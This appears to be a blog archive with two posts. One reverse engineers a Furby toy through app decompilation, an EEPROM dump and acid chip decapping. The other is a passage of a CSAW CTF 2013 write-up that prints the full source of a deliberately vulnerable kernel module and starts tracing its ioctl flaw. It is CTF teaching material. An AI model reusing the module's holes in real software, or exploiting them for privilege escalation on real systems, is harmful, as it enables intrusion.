Reverse Engineering a Furby

Table of Contents

Introduction

This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices.  After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame.  Everyone laughed, and we all moved on with our lives.

However, the joke didn’t stop there.  Within two weeks, this same friend said they had a present for me.  And that’s how I started reverse engineering a Furby.

About the Device

E2AD1AF65056900B10397BC7C0DE439BA Furby is an evil robotic children’s toy wrapped in colored fur.  Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli.

Since its original debut in 1998, the Furby apparently received a number of upgrades and new features.  The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app.

Inter-Device Communication

As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app.  However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols.  Instead, a look at the official Hasbro Furby FAQ told a more interesting story:

Q. There is a high pitched tone coming from Furby and/or my iOS device.

A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals.

Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies.  That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone.  #badBIOS anyone?

This was easily confirmed by use of the mobile app which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby.  The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app.

Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol.  Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby.

Reversing the Android App

Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding.

After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits:

$ unzip -q com.hasbro.furby.apk
$ d2j-dex2jar.sh classes.dex
dex2jar classes.dex -> classes-dex2jar.jar
$

Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files.  I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd().

Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class:

private void sendComAirCmd(int paramInt)
{    
  Logger.log(Deli.TAG, "sent command: " + paramInt);
  Integer localInteger1 = Integer.valueOf(paramInt);
  int i = 0x1F & localInteger1.intValue() >> 5;
  int j = 32 + (0x1F & localInteger1.intValue());
  ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2];
  ComAirWrapper localComAirWrapper1 = this.comairWrapper;
  localComAirWrapper1.getClass();
  arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F);
  ComAirWrapper localComAirWrapper2 = this.comairWrapper;
  localComAirWrapper2.getClass();
  arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F);

The name generalplus appears to identify the Taiwanese company General Plus, which “engage[s] in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).”  I was unable to find any public information about the GPLib/ComAir library.  However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others.

The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself.  Continuing to dig, I found the file libGPLibComAir.so:

$ file lib/armeabi/libGPLibComAir.so 
lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped

Quick analysis on the binary showed that this was likely the code I had been looking for:

$ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command
0000787d T ComAir_GetCommand
00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode
000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand
00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode
000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode
00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode
000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode
000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode
00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode
00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo
000058cd T _Z13EncodeRegCodethPh
00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi
00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv
00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv
00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode
000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag
00004e05 T _ZN12C_ComAirCore6DecodeEPsi
00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs
00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv
0000547d T _ZN15C_ComAirEncoder11PlayCommandEi
000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi
00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv
0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi
000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv
000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode
000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv
00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv
000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi
000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs
00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv
000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList
00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi
00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif
00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf
00005369 T _ZN15C_ComAirEncoder4InitEv
000051f9 T _ZN15C_ComAirEncoderC1Ev
000050b9 T _ZN15C_ComAirEncoderC2Ev
00005351 T _ZN15C_ComAirEncoderD1Ev
00005339 T _ZN15C_ComAirEncoderD2Ev

I loaded the binary in IDA Pro and quickly confirmed my thought.  The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function:

unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3)
{
  int v3; // ST0C_4@1
  int v4; // ST04_4@1
  int v5; // ST1C_4@1
  const void *v6; // ST18_4@1
  unsigned int v7; // ST14_4@1

  v3 = a1;
  v4 = a3;
  v5 = _JNIEnv::GetArrayLength();
  v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0);
  v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5);
  _JNIEnv::ReleaseShortArrayElements(v3);
  return v7;
}

Within C_ComAirCore::DecodeBuffer() resided a looping call to ComAir_DecFrameProc() which appeared to be referencing some table of phase coefficients:

int __fastcall ComAir_DecFrameProc(int a1, int a2)
{
  int v2; // r5@1
  signed int v3; // r4@1
  int v4; // r0@3
  int v5; // r3@5
  signed int v6; // r2@5

  v2 = a1;
  v3 = 0x40;
  if ( ComAir_Rate_Mode != 1 )
  {
    v3 = 0x80;
    if ( ComAir_Rate_Mode == 2 )
      v3 = 0x20;
  }
  v4 = (a2 << 0xC) / 0x64;   if ( v4 > (signed int)&PHASE_COEF[0x157F] )
    v4 = (int)&PHASE_COEF[0x157F];
  v5 = v2;
  v6 = 0;
  do
  {
    ++v6;
    *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10;
    v5 += 2;
  }
  while ( v3 > v6 );
  ComAirDec();
  return ComAir_GetCommand();
}

Near the end of the function was a call to the very large function ComAirDec(), which likely was decompiled with the incorrect number of arguments and performed the bulk of the audio decoding process.  Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced.

Itching to continue onto reverse engineering the hardware, I began disassembling the device.

Reversing the Hardware

Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and number of hidden screws.  Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device.

The heart of the Furby lies in the following two-piece circuit board:

Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version.  Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, the EEPROM chip (U2 on the board) was branded as Shenzen LIZE on the U.S. version, the French version was branded ATMEL:

The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy.  This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro.  This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it proves harder to identify the chips due to the lack of markings.  However, one may still simply inspect the traces connected to the chip and infer its functionality from there.

For now, let’s start with something more accessible and dump the exposed EEPROM.

Dumping the EEPROM

The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings:

20131216_125125

By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption.  The chip on the U.S. version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzen LIZE.

Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board.  Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air.

20131202_180405_cropped

Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually.  I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development.

pinoutReferencing the datasheet, we find that there are eight total pins to deal with.  Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with.  By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip.  Since we only have one EEPROM, we can simply tie all three to ground.  Likewise, pin 4 (GND) is also connected to ground.

Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines.  SDA provides bi-directional serial data transfer, while SCL provides a clock signal.

Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode.  Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts).  Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it.  Pin 8 (VCC) is also connected to the same positive power source.

20131217_045312

After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip:

#include <Wire.h>

#define disk1 0x50    // Address of eeprom chip

byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress ) {
    byte rdata = 0x11;
    Wire.beginTransmission(deviceaddress);
//    Wire.write((int)(eeaddress >> 8)); // MSB
    Wire.write((int)(eeaddress & 0xFF)); // LSB
    Wire.endTransmission();
    Wire.requestFrom(deviceaddress,1);
    if (Wire.available()) rdata = Wire.read();
    return rdata;

}

void setup(void)
{
  Serial.begin(9600);
  Wire.begin();  

  unsigned int i, j;
  unsigned char b;

  for ( i = 0; i < 16; i++ )
  {
    for ( j = 0; j < 16; j++ )
    {
      b = i2c_eeprom_read_byte(disk1, (i * 16) + j);
      if ( (b & 0xf0) == 0 )
        Serial.print("0");
      Serial.print(b, HEX);
      Serial.print(" ");
    }
    Serial.println();
  }

}

void loop(){}

Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out.  Since our EEPROM chip is only 256 bytes large, we are only using 8-bit memory addressing, hence using a single byte. Larger memory capacities require use of larger address spaces (9 bits, 10 bits, so on) which require two bytes to accompany all necessary address bits.

Upon running the sketch, we are presented with the following output:

2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18 
0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8

Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data.  By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes.

Decapping Proprietary Chips

With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy.  Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself.  Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself.

Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner.

First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of sheers and cut around it.

Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed.  The entire experiment took place in a fume hood which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in.

20131205_114824_cropped

Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size.  Since I was working with a lower concentration nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between 1-3 hours.

20131205_130037_cropped

“Medium” (left) and “Tiny” (right)

After each chip had been fully exposed and any leftover debris removed, I removed the beakers from the hot plate, let cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the entirety of it poured onto filter paper.  After rinsing each sample one or two more times with distilled water, the sample was then rinsed with acetone two or three times.

The large chip took the longest to finish simply due to the size of the attached circuit board fragment.  About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed.  At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact:

20131205_131418_cropped

About thirty minutes later and with the addition of more nitric acid, all three samples were cleaned and ready for imaging:

20131205_134650_cropped

SEM Imaging of Decapped Chips

20131209_133534The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings.  Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM) with great thanks to Dr. William Fowle.

Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate.  A few initial experimental SEM images were taken; however a number of artifacts were present that severely affected the image quality.

To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons.  Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface.

After treatment, the samples were placed back in the SEM and imaged with greater success.  Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture.  The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification:

Unfortunately, as can be seen in the image above, the medium chip did not appear to have cleaned completely in its nitric acid bath.  Although it is believed to be a memory storage device of some sort (by looking at optical images), it is impossible to discern any finer details from the SEM image.

A number of interesting features were found during the imaging process.  The marking “GHG554″ may be clearly seen directly west on the small chip.  Additionally, in similar font face, the marking “GFI392″ may be seen on the south-east corner of the large chip:

Image50Higher zoom images were also taken of generally interesting topology on the chips.  For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips:

If you are familiar with of these chips or any their features, feedback would be greatly appreciated.

EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads.

Additional images taken throughout this project are available at: http://www.flickr.com/photos/mncoppola/

Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project:

CSAW CTF 2013 Kernel Exploitation Challenge

Table of Contents

Introduction

CSAW CTF 2013 was last weekend, and this year I was lucky enough to be named a judge for the competition.  I decided to bring back the Linux kernel exploitation tradition of previous years and submitted the challenge “Brad Oberberg.”  Four of the 15 teams successfully solved the challenge.

Each team was presented with unprivileged access to a live VM running 32-bit Ubuntu 12.04.3 LTS.  The vulnerable kernel module csaw.ko was loaded on each system, and successful exploitation would allow for local privilege escalation and subsequent reading of the flag.  Source code to the kernel module was provided to each team, and may be viewed below (or downloaded here):

/*
 *                      .ed"""" """$$$$be.
 *                    -"           ^""**$$$e.
 *                  ."                   '$$$c
 *                 /     C S A W          "4$$b
 *                d  3      2 0 1 3         $$$$
 *                $  *                   .$$$$$$
 *               .$  ^c           $$$$$e$$$$$$$$.
 *               d$L  4.         4$$$$$$$$$$$$$$b
 *               $$$$b ^ceeeee.  4$$ECL.F*$$$$$$$
 *   e$""=.      $$$$P d$$$$F $ $$$$$$$$$- $$$$$$
 *  z$$b. ^c     3$$$F "$$$$b   $"$$$$$$$  $$$$*"      .=""$c
 * 4$$$$L        $$P"  "$$b   .$ $$$$$...e$$        .=  e$$$.
 * ^*$$$$$c  %..   *c    ..    $$ 3$$$$$$$$$$eF     zP  d$$$$$
 *   "**$$$ec   "   %ce""    $$$  $$$$$$$$$$*    .r" =$$$$P""
 *         "*$b.  "c  *$e.    *** d$$$$$"L$$    .d"  e$$***"
 *           ^*$$c ^$c $$$      4J$$$$$% $$$ .e*".eeP"
 *              "$$$$$$"'$=e....$*$$**$cz$$" "..d$*"
 *                "*$$$  *=%4.$ L L$ P3$$$F $$$P"
 *                   "$   "%*ebJLzb$e$$$$$b $P"
 *                     %..      4$$$$$$$$$$ "
 *                      $$$e   z$$$$$$$$$$%
 *                       "*$c  "$$$$$$$P"
 *                        ."""*$$$$$$$$bc
 *                     .-"    .$***$$$"""*e.
 *                  .-"    .e$"     "*$c  ^*b.
 *           .=*""""    .e$*"          "*bc  "*$e..
 *         .$"        .z*"               ^*$e.   "*****e.
 *         $$ee$c   .d"                     "*$.        3.
 *         ^*$E")$..$"                         *   .ee==d%
 *            $.d$$$*                           *  J$$$e*
 *             """""                              "$$$" Gilo95'
 */

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/miscdevice.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/random.h>
#include <linux/list.h>
#include <linux/sched.h>
#include <asm/uaccess.h>

#define DRIVER_VERSION "CSAW SUCKiT v1.3.37"

#define CSAW_IOCTL_BASE     0x77617363
#define CSAW_ALLOC_HANDLE   CSAW_IOCTL_BASE+1
#define CSAW_READ_HANDLE    CSAW_IOCTL_BASE+2
#define CSAW_WRITE_HANDLE   CSAW_IOCTL_BASE+3
#define CSAW_GET_CONSUMER   CSAW_IOCTL_BASE+4
#define CSAW_SET_CONSUMER   CSAW_IOCTL_BASE+5
#define CSAW_FREE_HANDLE    CSAW_IOCTL_BASE+6
#define CSAW_GET_STATS	    CSAW_IOCTL_BASE+7

#define MAX_CONSUMERS 255

struct csaw_buf {
    unsigned long consumers[MAX_CONSUMERS];
    char *buf;
    unsigned long size;
    unsigned long seed;
    struct list_head list;
};

LIST_HEAD(csaw_bufs);

struct alloc_args {
    unsigned long size;
    unsigned long handle;
};

struct free_args {
    unsigned long handle;
};

struct read_args {
    unsigned long handle;
    unsigned long size;
    void *out;
};

struct write_args {
    unsigned long handle;
    unsigned long size;
    void *in;
};

struct consumer_args {
    unsigned long handle;
    unsigned long pid;
    unsigned char offset;
};

struct csaw_stats {
    unsigned long clients;
    unsigned long handles;
    unsigned long bytes_read;
    unsigned long bytes_written;
    char version[40];
};

unsigned long clients = 0;
unsigned long handles = 0;
unsigned long bytes_read = 0;
unsigned long bytes_written = 0;

static int csaw_open ( struct inode *inode, struct file *file )
{
    clients++;

    return 0;
}

static int csaw_release ( struct inode *inode, struct file *file )
{
    clients--;

    return 0;
}

int alloc_buf ( struct alloc_args *alloc_args )
{
    struct csaw_buf *cbuf;
    char *buf;
    unsigned long size, seed, handle;

    size = alloc_args->size;

    if ( ! size )
        return -EINVAL;

    cbuf = kmalloc(sizeof(*cbuf), GFP_KERNEL);
    if ( ! cbuf )
        return -ENOMEM;

    buf = kzalloc(size, GFP_KERNEL);
    if ( ! buf )
    {
        kfree(cbuf);
        return -ENOMEM;
    }

    cbuf->buf = buf;
    cbuf->size = size;

    memset(&cbuf->consumers, 0, sizeof(cbuf->consumers));
    cbuf->consumers[0] = current->pid;

    get_random_bytes(&seed, sizeof(seed));

    cbuf->seed = seed;

    handle = (unsigned long)buf ^ seed;

    list_add(&cbuf->list, &csaw_bufs);

    alloc_args->handle = handle;

    return 0;
}

void free_buf ( struct csaw_buf *cbuf )
{
    list_del(&cbuf->list);
    kfree(cbuf->buf);
    kfree(cbuf);
}

struct csaw_buf *find_cbuf ( unsigned long handle )
{
    struct csaw_buf *cbuf;

    list_for_each_entry ( cbuf, &csaw_bufs, list )
        if ( handle == ((unsigned long)cbuf->buf ^ cbuf->seed) )
            return cbuf;

    return NULL;
}

static long csaw_ioctl ( struct file *file, unsigned int cmd, unsigned long arg )
{
    int ret = 0;
    unsigned long *argp = (unsigned long *)arg;

    switch ( cmd )
    {
        case CSAW_ALLOC_HANDLE:
        {
            int ret;
            struct alloc_args alloc_args;

            if ( copy_from_user(&alloc_args, argp, sizeof(alloc_args)) )
                return -EFAULT;

            if ( (ret = alloc_buf(&alloc_args)) < 0 )
                return ret;

            if ( copy_to_user(argp, &alloc_args, sizeof(alloc_args)) )
                return -EFAULT;

            handles++;

            break;
        }

        case CSAW_READ_HANDLE:
        {
            struct read_args read_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;
            unsigned long to_read;

            if ( copy_from_user(&read_args, argp, sizeof(read_args)) )
                return -EFAULT;

            cbuf = find_cbuf(read_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            to_read = min(read_args.size, cbuf->size);

            if ( copy_to_user(read_args.out, cbuf->buf, to_read) )
                return -EFAULT;

            bytes_read += to_read;

            break;
        }

        case CSAW_WRITE_HANDLE:
        {
            struct write_args write_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;
            unsigned long to_write;

            if ( copy_from_user(&write_args, argp, sizeof(write_args)) )
                return -EFAULT;

            cbuf = find_cbuf(write_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            to_write = min(write_args.size, cbuf->size);

            if ( copy_from_user(cbuf->buf, write_args.in, to_write) )
                return -EFAULT;

            bytes_written += to_write;

            break;
        }

        case CSAW_GET_CONSUMER:
        {
            struct consumer_args consumer_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
                return -EFAULT;

            cbuf = find_cbuf(consumer_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            consumer_args.pid = cbuf->consumers[consumer_args.offset];

            if ( copy_to_user(argp, &consumer_args, sizeof(consumer_args)) )
                return -EFAULT;

            break;
        }

        case CSAW_SET_CONSUMER:
        {
            struct consumer_args consumer_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
                return -EFAULT;

            cbuf = find_cbuf(consumer_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            cbuf->consumers[consumer_args.offset] = consumer_args.pid;

            break;
        }

        case CSAW_FREE_HANDLE:
        {
            struct free_args free_args;
            struct csaw_buf *cbuf;
            unsigned int i, authorized = 0;

            if ( copy_from_user(&free_args, argp, sizeof(free_args)) )
                return -EFAULT;

            cbuf = find_cbuf(free_args.handle);
            if ( ! cbuf )
                return -EINVAL;

            for ( i = 0; i < MAX_CONSUMERS; i++ )
                 if ( current->pid == cbuf->consumers[i] )
                    authorized = 1;

            if ( ! authorized )
                return -EPERM;

            free_buf(cbuf);

            handles--;

            break;
        }

        case CSAW_GET_STATS:
        {
            struct csaw_stats csaw_stats;

            csaw_stats.clients = clients;
            csaw_stats.handles = handles;
            csaw_stats.bytes_read = bytes_read;
            csaw_stats.bytes_written = bytes_written;
            strcpy(csaw_stats.version, DRIVER_VERSION);

            if ( copy_to_user(argp, &csaw_stats, sizeof(csaw_stats)) )
                return -EFAULT;

            break;
        }

        default:
            ret = -EINVAL;
            break;
    }

    return ret;
}

static ssize_t csaw_read ( struct file *file, char *buf, size_t count, loff_t *pos )
{
    char *stats;
    unsigned int to_read;
    unsigned int ret;

    stats = kmalloc(1024, GFP_KERNEL);
    if ( ! buf )
        return -ENOMEM;

    ret = snprintf(stats, 1024, "Active clients: %lu\nHandles allocated: %lu\nBytes read: %lu\nBytes written: %lu\n",
             clients, handles, bytes_read, bytes_written);

    if ( count < ret )
        to_read = count;
    else
        to_read = ret;

    if ( copy_to_user(buf, stats, to_read) )
    {
        kfree(stats);
        return -EFAULT;
    }

    kfree(stats);

    return 0;
}

static const struct file_operations csaw_fops = {
    owner:          THIS_MODULE,
    open:           csaw_open,
    release:        csaw_release,
    unlocked_ioctl: csaw_ioctl,
    read:           csaw_read,
};

static struct miscdevice csaw_miscdev = {
    name:   "csaw",
    fops:   &csaw_fops
};

static int __init lezzdoit ( void )
{
    misc_register(&csaw_miscdev);

    return 0;
}

static void __exit wereouttahurr ( void )
{
    misc_deregister(&csaw_miscdev);
}

module_init(lezzdoit);
module_exit(wereouttahurr);

MODULE_LICENSE("GPL");

Understanding the Code

The kernel module is meant to provide a shared buffer system between processes.  By interacting with the /dev/csaw interface, processes may do various things such as allocating a new buffer of arbitrary size, reading and writing to the buffer, and controlling which process IDs may operate on it.  The main point of interaction with the module is through the ioctl handler csaw_ioctl().

The CSAW_ALLOC_HANDLE command allocates a new buffer of size specified by the user and returns a handle.  A handle in this context is simply the the buffer address XOR’d with a random 32-bit value.

Given a valid handle to an existing allocated buffer, the commands CSAW_READ_HANDLE and CSAW_WRITE_HANDLE allow the user to read and write the contents of the buffer.  Only process IDs authorized in the buffer’s consumers array may perform these operations, however.

Again, given a valid handle to an existing allocated buffer, the CSAW_GET_CONSUMER and CSAW_SET_CONSUMER commands allow only authorized processes to modify the buffer’s consumers array.

Finally, the CSAW_FREE_HANDLE command allows authorized consumers to free a given buffer.

An extra command CSAW_GET_STATS provides no direct functionality towards shared buffer management, but provides interesting debug information about the module.  Calling read() on the interface provides similar data.

Tracing the Vulnerable Code Path

Upon entry to csaw_ioctl(), user controls the arguments cmd and arg, and thus the variable argp:

183 static long csaw_ioctl ( struct file *file, unsigned int cmd, unsigned long arg )
184 {
185     int ret = 0;
186     unsigned long *argp = (unsigned long *)arg;
187 
188     switch ( cmd )
189     {

By providing the CSAW_SET_CONSUMER command, the following case is chosen:

299         case CSAW_SET_CONSUMER:
300         {
301             struct consumer_args consumer_args;
302             struct csaw_buf *cbuf;
303             unsigned int i, authorized = 0;
304 
305             if ( copy_from_user(&consumer_args, argp, sizeof(consumer_args)) )
306                 return -EFAULT;
307 
308             cbuf = find_cbuf(consumer_args.handle);
309             if ( ! cbuf )
310                 return -EINVAL;

On line 305, user data is safely copied into the struct consumer_args:

91 struct consumer_args {
92     unsigned long handle;
93     unsigned long pid;
94     unsigned char offset;
95 };

On line 308, consumer_args.handle is verified to be a valid handle.  By previously allocating a new buffer via the CSAW_ALLOC_HANDLE command and passing the returned handle here, this check may be satisfied.

Next, the calling process to verified to be in the list of authorized consumers:

312             for ( i = 0; i < MAX_CONSUMERS; i++ )
313                 if ( current->pid == cbuf->consumers[i] )
314                     authorized = 1;
315 
316             if ( ! authorized )
317                 return -EPERM;

Since our current process is also the creator of the given handle, this check is satisfied automatically due to the consumers array being initialized with the current process ID.

Next, the consumers list is updated to reflect the desired edit:

319             cbuf->consumers[consumer_args.offset] = consumer_args.pid;

Line 319 is interesting for a variety of reasons.

At first sight, it appears to suffer from an unbounded array index vulnerability due to the user-controlled consumer_args.offset value being used directly as an array index without prior sanity check.  With such a vulnerability, it would be possible to write a user-controlled 32-bit value at an arbitrary offset from &cbuf->consumers.

However, upon further inspection of the struct definition, we find that consumer_args.offset is in fact of type unsigned char, meaning that its value is bounded from 0-255 instead of 0-(232-1).

Looking at the definition of struct csaw_buf, we find that cbuf->consumers is appropriately sized and doesn’t allow a user to index outside of the array:

58 #define MAX_CONSUMERS 255
59 
60 struct csaw_buf {
